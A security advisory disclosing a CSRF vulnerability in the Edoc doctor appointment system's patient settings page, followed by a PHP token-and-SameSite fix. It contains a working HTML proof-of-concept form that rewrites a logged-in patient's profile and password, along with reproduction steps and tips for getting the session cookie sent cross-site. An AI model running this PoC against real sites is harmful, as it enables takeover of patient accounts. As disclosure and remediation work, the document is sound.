Edoc-doctor-appointment-system v1.0.1 was discovered to contain a cross-site request forgery (CSRF) vulnerability via /patient/settings.php . The settings page submits the profile form to /patient/edit-user.php, which accepts the update without any anti-CSRF token, so a remote attacker who lures a logged-in patient to a crafted page can hijack that user's authentication and change every field the form carries: name, email, NIC, telephone, address and password.
PoC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://www.doctor111.com/patient/edit-user.php" method="POST">
<input type="hidden" name="id00" value="3" />
<input type="hidden" name="oldemail" value="dsa@qw.cn" />
<input type="hidden" name="email" value="dsaaaaaaa@qw.cn" />
<input type="hidden" name="name" value="w eesssss" />
<input type="hidden" name="nic" value="01" />
<input type="hidden" name="Tele" value="0171234567" />
<input type="hidden" name="address" value="rew" />
<input type="hidden" name="password" value="dsa@qw.cn1" />
<input type="hidden" name="cpassword" value="dsa@qw.cn1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
vendor : https://github.com/HashenUdara/edoc-doctor-appointment-system
Vulnerability Position : http://ip/patient/settings.php
Steps to reproduce :
Log in at http://ip/login.php .
Visit http://ip/patient/settings.php to reach the module's page.
Click the View button.
Change the name from "qq ww" to "hackhack".
Use Burp Suite to capture the request, then click the Save button.
Generate a CSRF PoC in Burp Suite (right-click the request > Engagement tools > Generate CSRF PoC).
Copy the HTML and save it as test.html.
Attention : you must drop the captured request after copying the HTML. If it is forwarded instead, your own session applies the change and the result can no longer be attributed to test.html.
Then open test.html in a browser that is logged in to the application and click the Submit request button.
You will see a pop-up window, and your name is now hackhack.
Note : the values in the PoC (host www.doctor111.com, id00=3, oldemail=dsa@qw.cn and the other fields) are the ones captured from the tester's own session; replace them with the target's. The attack also depends on the browser attaching the session cookie to a cross-site POST. PHP's default session cookie carries no SameSite attribute, and Chromium-based browsers treat such cookies as Lax and withhold them on cross-site POST except for a short grace period after the cookie is set, so run the PoC in a browser or configuration where the cookie is actually sent.
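Fix : the handler behind the settings form needs a per-session anti-CSRF token that the attacker's page cannot supply, and the session cookie should be marked SameSite so the cross-site POST above is not carrying it in the first place. The following is an added example of such a handler written for this advisory; it is not code from the edoc-doctor-appointment-system repository, and the function names (csrf_token, csrf_verify), the csrf_token form field and the $_SESSION['user_id'] key are assumptions about how the application could be wired.

```php
<?php
// Added example, not the project's own code: synchronizer-token CSRF
// protection for a profile-update handler like patient/edit-user.php.
// csrf_token(), csrf_verify(), the csrf_token field and $_SESSION['user_id']
// are assumed names, not identifiers from the application.
declare(strict_types=1);

// Harden the session cookie before the session starts. SameSite=Lax on its
// own stops the cross-site form POST used by the PoC; HttpOnly keeps page
// scripts from reading the cookie.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
    'secure'   => isset($_SERVER['HTTPS']),
]);
session_start();

// One random token per session, kept server-side and embedded in every form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a missing or wrong token rejects the request.
function csrf_verify(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    return is_string($expected) && is_string($submitted)
        && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    if (!isset($_SESSION['user_id'])) {   // assumed session key
        http_response_code(401);
        exit('Not logged in.');
    }
    // Bind the update to the logged-in user rather than to a posted id field,
    // so the id00 value in the request body is never trusted.
    $userId = (int) $_SESSION['user_id'];
    // ... validate name/email/nic/Tele/address/password and run the UPDATE
    //     for $userId here, as the existing handler does ...
}
?>
<!-- The settings form: the hidden token is what a cross-site page cannot supply -->
<form action="/patient/edit-user.php" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="name" value="">
  <input type="email" name="email" value="">
  <input type="password" name="password">
  <input type="password" name="cpassword">
  <input type="submit" value="Save">
</form>
```

With this in place, re-running test.html yields a 403 instead of the pop-up: Burp's generated form has no way to read the victim's csrf_token, and with SameSite=Lax the session cookie is not attached to the cross-site POST at all. Whether the original handler trusts the posted id00 field is not established by this advisory, but deriving the user from the session as above removes that question entirely.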